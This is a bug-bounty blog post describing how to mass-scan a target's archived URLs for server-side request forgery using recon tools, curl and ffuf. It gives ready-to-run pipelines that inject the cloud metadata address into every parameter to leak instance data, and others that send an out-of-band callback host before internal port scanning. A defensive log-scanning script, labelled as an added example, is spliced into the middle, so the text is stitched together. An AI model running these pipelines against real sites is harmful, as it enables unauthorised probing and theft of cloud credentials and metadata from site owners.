Finding SSRF by Full Automation

Hi, everyone

My name is Santosh Kumar Sha, I'm a security researcher from India (Assam). In this article, I will describe how I was able to find SSRF vulnerabilities by automating the hunt, and use them to leak private information: Amazon instance metadata, EC2 details and cloud-service data.

Tips for finding SSRF bugs with automation:

Tools required:

  1. gf (tomnomnom) — https://github.com/tomnomnom/gf
  2. qsreplace (tomnomnom) — https://github.com/tomnomnom/qsreplace
  3. ffuf — https://github.com/ffuf/ffuf
  4. gau (Corben) — https://github.com/lc/gau
  5. waybackurls (tomnomnom) — https://github.com/tomnomnom/waybackurls

Case #1: Accessing SSRF metadata with automation by just using curl and bash

Here we get access to the internal metadata service via SSRF: we collect every URL for the target from the Wayback Machine and check whether any of them lets us reach the internal metadata endpoint.

Suppose the target is targetme.com.

Here is the process for finding an SSRF that reaches the internal metadata service.

Commands for collecting the URLs:

waybackurls targetme.com >> blindssrftesturl.txt

gau -subs targetme.com >> blindssrftesturl.txt

cat blindssrftesturl.txt | sort -u | anew | httpx | qsreplace 'http://169.254.169.254/latest/meta-data/hostname' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'

ohhh….yeah………………………….
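As an added example that is not part of the original post, here is the defender-side counterpart to Case #1: a small Python script that scans web-server access logs for request parameters pointing at the metadata address the probe above uses (169.254.169.254), including URL-encoded and scheme-less variants. The log lines, the log-format regex and the host set are constructed for this illustration.

```python
"""Flag access-log requests whose parameters point at the instance metadata address."""
import re
from urllib.parse import parse_qsl, unquote, urlparse

# Address probed in Case #1; extend with your provider's metadata hostnames if needed.
METADATA_HOSTS = {"169.254.169.254"}

# Combined-log-format prefix: client, timestamp, request line, status (constructed regex).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: a benign fetch, a plain probe, a URL-encoded probe, and no query at all.
LOG_LINES = [
    '10.0.0.5 - - [01/Jul/2022:10:00:01 +0000] "GET /fetch?url=https://example.com/img.png HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jul/2022:10:00:02 +0000] "GET /fetch?url=http://169.254.169.254/latest/meta-data/hostname HTTP/1.1" 200 44',
    '10.0.0.9 - - [01/Jul/2022:10:00:03 +0000] "GET /proxy?target=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jul/2022:10:00:04 +0000] "POST /login HTTP/1.1" 302 0',
]


def metadata_targets(path):
    """Return (param, host) for each query parameter whose value is a URL to a metadata host."""
    hits = []
    for name, value in parse_qsl(urlparse(path).query, keep_blank_values=True):
        candidate = unquote(value)  # parse_qsl decoded once; this also catches double encoding
        # Scheme-less values such as "169.254.169.254/latest" need "//" before urlparse sees a host.
        parsed = urlparse(candidate if "://" in candidate else "//" + candidate)
        if parsed.hostname in METADATA_HOSTS:
            hits.append((name, parsed.hostname))
    return hits


def scan_log(lines):
    """Return one finding per metadata-bound parameter found in the log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, host in metadata_targets(m["path"]):
            findings.append({"src": m["src"], "ts": m["ts"], "param": param,
                             "host": host, "status": int(m["status"])})
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        # A 200 here means the application fetched the metadata URL and deserves a closer look.
        print(f"{f['ts']} {f['src']} param={f['param']} -> {f['host']} status={f['status']}")
```

The author's pipeline detects success by grepping the response body for "compute.internal"; this script works from the request side instead, so it also catches probes that the application blocked.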

Case #2: Find blind SSRF with automation by just using curl and bash

To look for blind SSRF we again need every URL of the target to test against; we can collect them from the Wayback Machine.

Suppose the target is targetme.com.

Here is the process for finding blind SSRF.

Commands for collecting the URLs:

waybackurls targetme.com >> blindssrftesturl.txt

gau -subs targetme.com >> blindssrftesturl.txt

After collecting all the URLs, deduplicate them and resolve them with httpx so that dead hosts are dropped and false positives are removed:

cat blindssrftesturl.txt | sort -u | anew | httpx | tee -a prefinal_ssrftesturl.txt

Now use gf to extract only the URLs that carry parameters commonly vulnerable to SSRF:

cat prefinal_ssrftesturl.txt | gf ssrf >> final_ssrftesturl.txt

Finally, use ffuf together with a Burp Collaborator server (or pingb.in) to automate the test. Replace the placeholder below with your own Collaborator URL:

cat final_ssrftesturl.txt | qsreplace "http://YOUR-COLLABORATOR-SERVER" >> ssrf_auto-ffuf.txt

ffuf -c -w ssrf_auto-ffuf.txt -u FUZZ

Then check your Burp Collaborator server for any DNS pingback hits.

If you get a pingback, go on to internal port scanning.

ohhh….yeah………………………….

Takeaway

I'm sure that a lot of security researchers have already seen this process, but this is how I approach finding SSRF, and I have reported many on HackerOne using it. I hope this will help you find more SSRF.

That's one of the reasons why I wanted to share my experience, and also to highlight other techniques to exploit such vulnerabilities.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.

Thanks for reading :)
Stay Safe.

https://twitter.com/killmongar1996
